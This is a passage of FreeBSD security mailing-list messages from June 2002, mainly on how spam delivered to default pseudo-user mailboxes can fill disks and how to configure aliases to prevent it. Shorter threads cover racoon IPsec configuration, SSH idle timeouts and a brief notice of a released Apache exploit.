S.P." To: "Mark Hartley" , "twig les" Cc: References: Subject: Re: Possible security liability: Filling disks with junk or spam Date: Fri, 21 Jun 2002 22:35:29 -0500 MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 6.00.2600.0000 X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Better yet, comment out the lines in /etc/aliases, which will cause the mail to be returned since that user won't exist. Why increase the spam traffic by the use of the bitbucket? If the mail doesn't come back they just keep sending...... Kevin Kinsey ----- Original Message ----- From: "Mark Hartley" To: "twig les" Cc: Sent: Friday, June 21, 2002 8:06 PM Subject: Re: Possible security liability: Filling disks with junk or spam > > On 22-Jun-02 twig les wrote: > > Would it be viable to un-map the psuedo-users or would > > that break something? > > > > If you don't want to forward their messages to root (which I think is the best > way), you could always simply edit the aliases file and put the following lines > in: > > bin: /dev/null > news: /dev/null > > (and so on for each one) > > > Depends on how the admin wants to handle it. > > > Mark. > > > > > > --- Sean Kelly wrote: > >> On Fri, Jun 21, 2002 at 06:01:16PM -0600, Brett > >> Glass wrote: > >> ... > >> > A client recently called me in puzzlement, saying > >> that his system was > >> > misbehaving, and it turned out that this was what > >> had happened. The address > >> > "news@victim.com" had somehow wound up on quite a > >> few spammers' lists. He'd > >> > never used or hosted netnews, and so had no need > >> for the pseudo-user. But that > >> > pseudo-user was there by default, and the system > >> dutifully created a mailbox > >> > for him/her/it when the very first spam arrived. > >> It started growing by leaps > >> > and bounds until it was -- I kid you not! -- > >> several hundred megabytes in > >> > size. At which point the partition ran out of > >> room. > >> > > >> > It seems to me that pseudo-users should be > >> non-mailable, just as a basic > >> > security policy. Ideas for the best way to > >> implement this in the default > >> > install? > >> > >> If you look at /usr/src/etc/mail/aliases, you'll see > >> that pseudo-users are > >> mapped to root. I also see news in there: > >> news: root > >> > >> usenet: news > >> > >> > >> It seems to me that the best way to prevent such > >> things happening would be > >> to keep your aliases files up to date. Use > >> mergemaster and also maintain > >> the file for any pseudo-users you may add. At some > >> point, the > >> administrator has to become responsible for the > >> system they administer. > >> > >> -- > >> Sean Kelly | PGP KeyID: 77042C7B > >> smkelly@zombie.org | http://www.zombie.org > >> > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Jun 21 20:59:50 2002 Delivered-To: freebsd-security@freebsd.org Received: from apollo.backplane.com (apollo.backplane.com [216.240.41.2]) by hub.freebsd.org (Postfix) with ESMTP id ACB9A37B401 for ; Fri, 21 Jun 2002 20:59:46 -0700 (PDT) Received: from apollo.backplane.com (localhost [127.0.0.1]) by apollo.backplane.com (8.12.3/8.12.3) with ESMTP id g5M3xkCV066467; Fri, 21 Jun 2002 20:59:46 -0700 (PDT) (envelope-from dillon@apollo.backplane.com) Received: (from dillon@localhost) by apollo.backplane.com (8.12.3/8.12.3/Submit) id g5M3xkSl066466; Fri, 21 Jun 2002 20:59:46 -0700 (PDT) (envelope-from dillon) Date: Fri, 21 Jun 2002 20:59:46 -0700 (PDT) From: Matthew Dillon Message-Id: <200206220359.g5M3xkSl066466@apollo.backplane.com> To: Brett Glass Cc: security@FreeBSD.ORG Subject: Re: Possible security liability: Filling disks with junk or spam References: <200206220001.SAA26010@lariat.org> Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org This is rich. I just checked my own system and guess what I found? -rw------- 1 ftp dillon 11244 Apr 3 2001 ftp -rw-rw---- 1 man mail 765638 Jun 18 22:23 man ding ding ding ding! Give that man a cigar! All spam. :Two years ago, at BSDCon, I reported on a form of abuse known as a :"Rumplestiltskin attack," in which an attacker guessed names in rapid :... :mailed, cause the mail to be stored on the disk as if it were addressed to a :real user. No one may ever read it, but it's possible to fill the partition :and thereby wreak havoc. : :It seems to me that pseudo-users should be non-mailable, just as a basic :security policy. Ideas for the best way to implement this in the default :install? : :--Brett Glass I think for now the easiest thing to do is to adjust the default mail aliases file to /dev/null out pseudo users that come preinstalled in /etc/passwd. -Matt Matthew Dillon To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Jun 21 21:40:31 2002 Delivered-To: freebsd-security@freebsd.org Received: from spork.pantherdragon.org (spork.pantherdragon.org [206.29.168.146]) by hub.freebsd.org (Postfix) with ESMTP id 61F5537B404 for ; Fri, 21 Jun 2002 21:40:28 -0700 (PDT) Received: from spark.techno.pagans (spark.techno.pagans [4.61.202.145]) by spork.pantherdragon.org (Postfix) with ESMTP id 0FA3A471DA; Fri, 21 Jun 2002 21:40:23 -0700 (PDT) Received: from pantherdragon.org (speck.techno.pagans [172.21.42.2]) by spark.techno.pagans (Postfix) with ESMTP id 21EA3FDA0; Fri, 21 Jun 2002 21:40:19 -0700 (PDT) Message-ID: <3D13FFB2.39A80570@pantherdragon.org> Date: Fri, 21 Jun 2002 21:40:19 -0700 From: Darren Pilgrim X-Mailer: Mozilla 4.76 [en] (Win98; U) X-Accept-Language: en MIME-Version: 1.0 To: "Kevin Kinsey, DaleCo, S.P." Cc: Mark Hartley , twig les , security@FreeBSD.ORG Subject: Re: Possible security liability: Filling disks with junk or spam References: <004301c2199d$dbacf3e0$5dec910c@daleco> Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org "Kevin Kinsey, DaleCo, S.P." wrote: > > Better yet, comment out the lines in /etc/aliases, > which will cause the mail to be returned > since that user won't exist. > > Why increase the spam traffic by the use > of the bitbucket? If the mail doesn't come > back they just keep sending...... Without the aliases(5) entries, the mail will be delivered to local mailboxes for those pesudo-users, eventually filling the disk if you don't monitor disk usage. This was precisely the problem for Brett's client. IMO the proper way to handle this is to use an MTA that has some kind of access-control mechanism to restrict mail delivery to non-user accounts in addition to having a forwarding mechanism for them. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Jun 21 21:56: 4 2002 Delivered-To: freebsd-security@freebsd.org Received: from web10106.mail.yahoo.com (web10106.mail.yahoo.com [216.136.130.56]) by hub.freebsd.org (Postfix) with SMTP id 3B22F37B401 for ; Fri, 21 Jun 2002 21:55:59 -0700 (PDT) Message-ID: <20020622045559.41921.qmail@web10106.mail.yahoo.com> Received: from [68.5.49.41] by web10106.mail.yahoo.com via HTTP; Fri, 21 Jun 2002 21:55:59 PDT Date: Fri, 21 Jun 2002 21:55:59 -0700 (PDT) From: twig les Subject: Re: Possible security liability: Filling disks with junk or spam To: Darren Pilgrim , "Kevin Kinsey, DaleCo, S.P." Cc: Mark Hartley , twig les , security@FreeBSD.ORG In-Reply-To: <3D13FFB2.39A80570@pantherdragon.org> MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org When I asked if it would break something to forward those accounts' mail to /dev/null instead of root, I meant: do those psuedo-users actually send anything via mail or everything via syslog? Excuse the strange question, I'm a psuedo-admin (aka user). --- Darren Pilgrim wrote: > "Kevin Kinsey, DaleCo, S.P." wrote: > > > > Better yet, comment out the lines in /etc/aliases, > > which will cause the mail to be returned > > since that user won't exist. > > > > Why increase the spam traffic by the use > > of the bitbucket? If the mail doesn't come > > back they just keep sending...... > > Without the aliases(5) entries, the mail will be > delivered to local > mailboxes for those pesudo-users, eventually filling > the disk if you > don't monitor disk usage. This was precisely the > problem for Brett's > client. IMO the proper way to handle this is to use > an MTA that has > some kind of access-control mechanism to restrict > mail delivery to > non-user accounts in addition to having a forwarding > mechanism for > them. ===== ----------------------------------------------------------- Only fools have all the answers. ----------------------------------------------------------- __________________________________________________ Do You Yahoo!? Yahoo! - Official partner of 2002 FIFA World Cup http://fifaworldcup.yahoo.com To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Jun 21 22:13:14 2002 Delivered-To: freebsd-security@freebsd.org Received: from mail.gbronline.com (mail.gbronline.com [12.145.226.4]) by hub.freebsd.org (Postfix) with ESMTP id F041937B409 for ; Fri, 21 Jun 2002 22:13:09 -0700 (PDT) Received: from daleco [12.145.236.93] by mail.gbronline.com (SMTPD32-7.10) id A70928590048; Sat, 22 Jun 2002 00:11:37 -0500 Message-ID: <02b801c219ab$6d28fd20$5dec910c@daleco> From: "Kevin Kinsey, DaleCo, S.P." To: Subject: ReL Possible security liability: Filling disks with junk or spam Date: Sat, 22 Jun 2002 00:12:37 -0500 MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 6.00.2600.0000 X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org > ----- Original Message ----- > From: "Darren Pilgrim" > To: "Kevin Kinsey, DaleCo, S.P." > Cc: "Mark Hartley" ; "twig les" ; > > Sent: Friday, June 21, 2002 11:40 PM > Subject: Re: Possible security liability: Filling disks with junk or spam > > > > "Kevin Kinsey, DaleCo, S.P." wrote: > > > > > > Better yet, comment out the lines in /etc/aliases, > > > which will cause the mail to be returned > > > since that user won't exist. > > > > > > Why increase the spam traffic by the use > > > of the bitbucket? If the mail doesn't come > > > back they just keep sending...... > > > > Without the aliases(5) entries, the mail will be delivered > to local mailboxes for those pesudo-users, eventually > filling the disk if you don't monitor disk usage. This was > precisely the problem for Brett's client. < > Doh! Indeed it does.......though I had to reconfig a basically default /etc/aliases to get it to do this... > > >IMO the proper way to handle this is to use an MTA > that has some kind of access-control mechanism to > restrict mail delivery to non-user accounts in addition to > having a forwarding mechanism for them.< > > Seems reasonable. Or just do as /etc/aliases instructed in the first place...why do we only complain when caught in violation of our own policies? KDK To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Jun 21 22:14:51 2002 Delivered-To: freebsd-security@freebsd.org Received: from edgemaster.zombie.org (ip68-13-69-9.om.om.cox.net [68.13.69.9]) by hub.freebsd.org (Postfix) with ESMTP id E099437B403 for ; Fri, 21 Jun 2002 22:14:44 -0700 (PDT) Received: by edgemaster.zombie.org (Postfix, from userid 1001) id C584E66B05; Sat, 22 Jun 2002 00:14:43 -0500 (CDT) Date: Sat, 22 Jun 2002 00:14:43 -0500 From: Sean Kelly To: twig les Cc: Darren Pilgrim , "Kevin Kinsey, DaleCo, S.P." , Mark Hartley , security@FreeBSD.ORG Subject: Re: Possible security liability: Filling disks with junk or spam Message-ID: <20020622051443.GA31072@edgemaster.zombie.org> References: <3D13FFB2.39A80570@pantherdragon.org> <20020622045559.41921.qmail@web10106.mail.yahoo.com> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline In-Reply-To: <20020622045559.41921.qmail@web10106.mail.yahoo.com> User-Agent: Mutt/1.5.1i Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org On Fri, Jun 21, 2002 at 09:55:59PM -0700, twig les wrote: > When I asked if it would break something to forward > those accounts' mail to /dev/null instead of root, I > meant: do those psuedo-users actually send anything > via mail or everything via syslog? Excuse the strange > question, I'm a psuedo-admin (aka user). Having a username aliased to /dev/null doesn't affect the transmission of mail from that user. Even if there is a daemon that sends mail as that user, the mail will be delivered. The problem arises when there is important incoming mail, such as bounces and errors or alerts. Whether a specific pseudo-user needs to receive mail depends on your particular configuration and needs. If I were running a news server, I'd want to receive mail sent to news@. > --- Darren Pilgrim wrote: > > "Kevin Kinsey, DaleCo, S.P." wrote: > > > > > > Better yet, comment out the lines in /etc/aliases, > > > which will cause the mail to be returned > > > since that user won't exist. > > > > > > Why increase the spam traffic by the use > > > of the bitbucket? If the mail doesn't come > > > back they just keep sending...... > > > > Without the aliases(5) entries, the mail will be > > delivered to local > > mailboxes for those pesudo-users, eventually filling > > the disk if you > > don't monitor disk usage. This was precisely the > > problem for Brett's > > client. IMO the proper way to handle this is to use > > an MTA that has > > some kind of access-control mechanism to restrict > > mail delivery to > > non-user accounts in addition to having a forwarding > > mechanism for > > them. > > > ===== > ----------------------------------------------------------- > Only fools have all the answers. > ----------------------------------------------------------- > > __________________________________________________ > Do You Yahoo!? > Yahoo! - Official partner of 2002 FIFA World Cup > http://fifaworldcup.yahoo.com > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message -- Sean Kelly | PGP KeyID: 77042C7B smkelly@zombie.org | http://www.zombie.org To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sat Jun 22 0:27:23 2002 Delivered-To: freebsd-security@freebsd.org Received: from bsd.ist-ffo.de (bsd.ist-ffo.de [192.124.253.37]) by hub.freebsd.org (Postfix) with ESMTP id 0204637B4F4 for ; Sat, 22 Jun 2002 00:27:05 -0700 (PDT) Received: (from griesche@localhost) by bsd.ist-ffo.de (8.11.6/8.11.6) id g5M7R3T06825 for freebsd-security@freebsd.org; Sat, 22 Jun 2002 09:27:03 +0200 (CEST) (envelope-from griesche) Date: Sat, 22 Jun 2002 09:27:03 +0200 (CEST) From: Joachim Griesche Message-Id: <200206220727.g5M7R3T06825@bsd.ist-ffo.de> To: freebsd-security@freebsd.org Subject: Forwarding mail to /dev/null Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Hello! From my point of view, forwarding e-mails to /dev/null violates some basic assumptions on how an MTA should work. The following has been taken from /usr/share/doc/smm/09.sendmail/paper.ascii.gz: 2) Reliability, in the sense of guaranteeing that every message is correctly delivered or at least brought to the attention of a human for correct disposal; no message should ever be completely lost. If you don't have a service, you don't need the corresponding pseudo-user. If you have the service, RFC 2142 requires you to have the corresponding e-mail address, and root should glance at the e-mails arrived. (RFC 2142 has already been cited on the list.) With best regards Joachim Griesche Network administrator Institut fuer Solartechnologien GmbH Frankfurt (Oder), Germany To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sat Jun 22 0:51: 4 2002 Delivered-To: freebsd-security@freebsd.org Received: from mailrelay1.lrz-muenchen.de (mailrelay1.lrz-muenchen.de [129.187.254.101]) by hub.freebsd.org (Postfix) with ESMTP id 954F137B95A for ; Sat, 22 Jun 2002 00:50:26 -0700 (PDT) Received: from [10.150.180.176] by mailrelay1.lrz-muenchen.de with ESMTP; Sat, 22 Jun 2002 09:50:22 +0200 Received: from elevation.uni.stoert.net (r180177.olydorf.swh.mhn.de [10.150.180.177]) by spirit.zuhause.stoert.net (8.11.6/8.11.6) with ESMTP id g5M7oKp32971; Sat, 22 Jun 2002 09:50:20 +0200 (CEST) (envelope-from corecode@elevation.uni.stoert.net) Received: (from corecode@localhost) by elevation.uni.stoert.net (8.12.3/8.12.3/Submit) id g5M7oJeH000358; Sat, 22 Jun 2002 09:50:19 +0200 (CEST) (envelope-from corecode) Date: Sat, 22 Jun 2002 09:50:13 +0200 From: "Simon 'corecode' Schubert" To: Darren Pilgrim Cc: kdk@daleco.biz, mark@work.drapple.com, twigles@yahoo.com, security@FreeBSD.ORG Subject: Re: Possible security liability: Filling disks with junk or spam Message-Id: <20020622095013.40db50a3.corecode@corecode.ath.cx> In-Reply-To: <3D13FFB2.39A80570@pantherdragon.org> References: <004301c2199d$dbacf3e0$5dec910c@daleco> <3D13FFB2.39A80570@pantherdragon.org> X-Mailer: Sylpheed version 0.7.8claws (GTK+ 1.2.10; i386-portbld-freebsd4.6) Mime-Version: 1.0 Content-Type: multipart/signed; protocol="application/pgp-signature"; boundary="=.Q+H7dNHSyh6Bj7" Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org --=.Q+H7dNHSyh6Bj7 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit On Fri, 21 Jun 2002 21:40:19 -0700 Darren Pilgrim wrote: > "Kevin Kinsey, DaleCo, S.P." wrote: > > Better yet, comment out the lines in /etc/aliases, > > which will cause the mail to be returned > > since that user won't exist. > > > > Why increase the spam traffic by the use > > of the bitbucket? If the mail doesn't come > > back they just keep sending...... > Without the aliases(5) entries, the mail will be delivered to local > mailboxes for those pesudo-users, eventually filling the disk if you > don't monitor disk usage. This was precisely the problem for Brett's > client. IMO the proper way to handle this is to use an MTA that has > some kind of access-control mechanism to restrict mail delivery to > non-user accounts in addition to having a forwarding mechanism for > them. to my knowledge this can be easily achieved by (manually) changing the permissions of the spool files: chown 0.0 /var/mail/news chmod 400 /var/mail/news et voila! mail can't be delivered and bounces (tho postmaster@ might get an anoying message :) cheerz simon -- /"\ http://corecode.ath.cx/#donate \ / \ ASCII Ribbon Campaign / \ Against HTML Mail and News --=.Q+H7dNHSyh6Bj7 Content-Type: application/pgp-signature -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.7 (FreeBSD) iD8DBQE9FCw6r5S+dk6z85oRAjY1AJsG9xkBG/Um7ndeb+IBSYqliSE33gCeNVna ctEztWVQCuoLu068l7eGWiA= =9976 -----END PGP SIGNATURE----- --=.Q+H7dNHSyh6Bj7-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sat Jun 22 3: 2:36 2002 Delivered-To: freebsd-security@freebsd.org Received: from mail102.csoft.net (lilly.csoft.net [63.111.22.101]) by hub.freebsd.org (Postfix) with SMTP id E006037B401 for ; Sat, 22 Jun 2002 03:02:31 -0700 (PDT) Received: (qmail 35368 invoked by uid 1876); 22 Jun 2002 10:03:53 -0000 Date: Sat, 22 Jun 2002 05:03:53 -0500 From: Nick Slager To: cjclark@alum.mit.edu Cc: security@freebsd.org Subject: Re: Configuring sainfo in racoon(8) Message-ID: <20020622050353.A35129@zith.net> References: <20020618130547.A11688@blossom.cjclark.org> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: <20020618130547.A11688@blossom.cjclark.org>; from crist.clark@attbi.com on Tue, Jun 18, 2002 at 01:05:47PM -0700 X-Homer: Whoohooooooo! Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Thus spake Crist J. Clark (crist.clark@attbi.com): > > my_identifier user_fqdn "cjc@mydomain.org"; > peer_identifier user_fqdn "cjc@mydomain.org"; > ... > > } > > sainfo user_fqdn "cjc@mydomain.org" user_fqdn "cjc@mydomain.org" { > ... > > } > Your specified sainfo stanza isn't matching (to state the bleedin' obvious, as John Cleese would say). Perhaps this misses the point of what you're trying to do, but is there some reason you have to use user_fqdn identifers? Try using: my_identifier address; and change your sainfo stanza to reflect that address. Regards, Nick To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sat Jun 22 3:57:12 2002 Delivered-To: freebsd-security@freebsd.org Received: from pa169.kurdwanowa.sdi.tpnet.pl (pa169.kurdwanowa.sdi.tpnet.pl [213.77.148.169]) by hub.freebsd.org (Postfix) with ESMTP id 4A68B37B403 for ; Sat, 22 Jun 2002 03:57:05 -0700 (PDT) Received: from velvet.zaraska.dhs.org (velvet.zaraska.dhs.org [192.168.11.2]) by pa169.kurdwanowa.sdi.tpnet.pl (Postfix) with SMTP id 2ACB21E3D; Sat, 22 Jun 2002 10:56:57 +0000 (GMT) Date: Sat, 22 Jun 2002 12:57:13 +0200 From: Krzysztof Zaraska To: freebsd-security@freebsd.org Subject: Apache FreeBSD exploit released Message-Id: <20020622125713.547c2546.kzaraska@student.uci.agh.edu.pl> X-Mailer: Sylpheed version 0.7.3 (GTK+ 1.2.10; i386-redhat-linux) Mime-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org For those of you who do not read bugtraq, GOBBLES have posted a new version of their apache exploit which is said to support also Net and FreeBSD. -- // Krzysztof Zaraska * kzaraska (at) student.uci.agh.edu.pl // Prelude IDS: http://www.prelude-ids.org/ // A dream will always triumph over reality, once it is given the chance. // -- Stanislaw Lem To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sat Jun 22 4:34:26 2002 Delivered-To: freebsd-security@freebsd.org Received: from gs166.sp.cs.cmu.edu (GS166.SP.CS.CMU.EDU [128.2.205.169]) by hub.freebsd.org (Postfix) with SMTP id 722AE37B400 for ; Sat, 22 Jun 2002 04:34:21 -0700 (PDT) To: Lawrence Sica Cc: twig les , freebsd-security@FreeBSD.ORG Subject: Re: SSH timeout settings References: <20020620214512.42806.qmail@web10101.mail.yahoo.com> <3D1281DE.5000804@earthlink.net> From: Dan Pelleg Date: 22 Jun 2002 07:33:37 -0400 In-Reply-To: <3D1281DE.5000804@earthlink.net> Message-ID: Lines: 36 User-Agent: Gnus/5.0808 (Gnus v5.8.8) XEmacs/21.1 (Cuyahoga Valley) MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Lawrence Sica writes: > twig les wrote: > > Hey all, I think this is an easy one masquerading as a > > tough one.... My OpenSSH on my Free 4.4 Release box > > just lets me keep an open session indefinitely without > > any activity. I've read man sshd and all sorts of > > other things but no mention. > > So the short version is: where do I lower the timeout > > > of SSH? > > > > > > If you are using login with ssh, then you can modify login.conf: > > from man 5 login.conf > > idletime time Maximum idle time before logout. > > > Read the manpage for more info and don't forget to run cap_mkdb if you > change login.conf. > Does this actually work for you? There have been reports by different people that this is a no-op. A very old PR (conf/9874) suggests it was never implemented and should be removed from the manpage. The are at least two ports (blimitd and idled) that claim to enforce this limit - I've tried neither. -- Dan Pelleg To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sat Jun 22 10:17: 9 2002 Delivered-To: freebsd-security@freebsd.org Received: from orthanc.ab.ca (orthanc.ab.ca [216.123.203.186]) by hub.freebsd.org (Postfix) with ESMTP id 6153E37B405 for ; Sat, 22 Jun 2002 10:17:06 -0700 (PDT) Received: from orthanc.ab.ca (localhost.orthanc.ab.ca [127.0.0.1]) by orthanc.ab.ca (8.12.3/8.12.3) with ESMTP id g5MHGmJZ082170; Sat, 22 Jun 2002 11:16:49 -0600 (MDT) (envelope-from lyndon@orthanc.ab.ca) Message-Id: <200206221716.g5MHGmJZ082170@orthanc.ab.ca> From: Lyndon Nerenberg Organization: The Frobozz Magic Homing Pigeon Company To: Darren Pilgrim Cc: "Kevin Kinsey, DaleCo, S.P." , Mark Hartley , twig les , security@FreeBSD.ORG Subject: Re: Possible security liability: Filling disks with junk or spam In-reply-to: Your message of "Fri, 21 Jun 2002 21:40:19 PDT." <3D13FFB2.39A80570@pantherdragon.org> X-Mailer: mh-e 5.0.92; MH 6.8.4; Emacs 21.2 Date: Sat, 22 Jun 2002 11:16:48 -0600 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org >>>>> "Darren" == Darren Pilgrim writes: Darren> IMO the proper Darren> way to handle this is to use an MTA that has some kind of Darren> access-control mechanism to restrict mail delivery to Darren> non-user accounts in addition to having a forwarding Darren> mechanism for them. Such as a REJECT entry in /etc/mail/access? --lyndon To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sat Jun 22 10:23:19 2002 Delivered-To: freebsd-security@freebsd.org Received: from orthanc.ab.ca (orthanc.ab.ca [216.123.203.186]) by hub.freebsd.org (Postfix) with ESMTP id C435537B401 for ; Sat, 22 Jun 2002 10:23:14 -0700 (PDT) Received: from orthanc.ab.ca (localhost.orthanc.ab.ca [127.0.0.1]) by orthanc.ab.ca (8.12.3/8.12.3) with ESMTP id g5MHNEJZ082194; Sat, 22 Jun 2002 11:23:14 -0600 (MDT) (envelope-from lyndon@orthanc.ab.ca) Message-Id: <200206221723.g5MHNEJZ082194@orthanc.ab.ca> From: Lyndon Nerenberg Organization: The Frobozz Magic Homing Pigeon Company To: twig les Cc: security@FreeBSD.ORG Subject: Re: Possible security liability: Filling disks with junk or spam In-reply-to: Your message of "Fri, 21 Jun 2002 21:55:59 PDT." <20020622045559.41921.qmail@web10106.mail.yahoo.com> X-Mailer: mh-e 5.0.92; MH 6.8.4; Emacs 21.2 Date: Sat, 22 Jun 2002 11:23:14 -0600 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org >>>>> "twig" == twig les writes: twig> When I asked if it would break something to forward those twig> accounts' mail to /dev/null instead of root, I meant: do those twig> psuedo-users actually send anything via mail or everything via twig> syslog? In the case of UUCP and news, if you are running either of those subsystems the system will send legitimate mail to those logins, so you should be reading them. OTOH, if you don't run UUCP or news, you can reject mail to those accounts. Note that most Usenet software packages have a configurable target for emailed status reports, so you can have them mail directly to another address (say, root) if you like. Also, messages about the news subsystem are traditionally sent to usenet@, and not news@. On UNIX systems, the usenet address almost always exists only as an entry in the mail alias file. If you run news, both usenet@ and news@ should be redirected to a mailbox that is read regularly. --lyndon To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sat Jun 22 12: 5:53 2002 Delivered-To: freebsd-security@freebsd.org Received: from rwcrmhc52.attbi.com (rwcrmhc52.attbi.com [216.148.227.88]) by hub.freebsd.org (Postfix) with ESMTP id 9CA5D37B40E for ; Sat, 22 Jun 2002 12:04:55 -0700 (PDT) Received: from blossom.cjclark.org ([12.234.91.48]) by rwcrmhc52.attbi.com (InterMail vM.4.01.03.27 201-229-121-127-20010626) with ESMTP id <20020622190451.YQNX2751.rwcrmhc52.attbi.com@blossom.cjclark.org>; Sat, 22 Jun 2002 19:04:51 +0000 Received: from blossom.cjclark.org (localhost. [127.0.0.1]) by blossom.cjclark.org (8.12.3/8.12.3) with ESMTP id g5MJ4oJK040795; Sat, 22 Jun 2002 12:04:50 -0700 (PDT) (envelope-from crist.clark@attbi.com) Received: (from cjc@localhost) by blossom.cjclark.org (8.12.3/8.12.3/Submit) id g5MJ4jrd040794; Sat, 22 Jun 2002 12:04:45 -0700 (PDT) X-Authentication-Warning: blossom.cjclark.org: cjc set sender to crist.clark@attbi.com using -f Date: Sat, 22 Jun 2002 12:04:45 -0700 From: "Crist J. Clark" To: Nick Slager Cc: security@freebsd.org Subject: Re: Configuring sainfo in racoon(8) Message-ID: <20020622120445.C33571@blossom.cjclark.org> Reply-To: cjclark@alum.mit.edu References: <20020618130547.A11688@blossom.cjclark.org> <20020622050353.A35129@zith.net> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5.1i In-Reply-To: <20020622050353.A35129@zith.net>; from ns@zith.net on Sat, Jun 22, 2002 at 05:03:53AM -0500 X-URL: http://people.freebsd.org/~cjc/ Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org On Sat, Jun 22, 2002 at 05:03:53AM -0500, Nick Slager wrote: > Thus spake Crist J. Clark (crist.clark@attbi.com): > > > > > my_identifier user_fqdn "cjc@mydomain.org"; > > peer_identifier user_fqdn "cjc@mydomain.org"; > > ... > > > > } > > > > sainfo user_fqdn "cjc@mydomain.org" user_fqdn "cjc@mydomain.org" { > > ... > > > > } > > > > Your specified sainfo stanza isn't matching (to state the bleedin' > obvious, as John Cleese would say). Yep. I realize that. racoon(8) reports it can't find the 'sainfo.' > Perhaps this misses the point of what you're trying to do, but is there > some reason you have to use user_fqdn identifers? > > Try using: > > my_identifier address; > > and change your sainfo stanza to reflect that address. I want to use 'user_fqdn' because, 1) One end has a dynamic address so I can't specify 'sainfo' with an address, and 2) I (will) have different policies for different peers so I do not want to use an 'anonymous' 'sainfo.' I have no attachment to using 'user_fqdn,' it's just that I don't want to try to use addresses since one end is dynamic, and 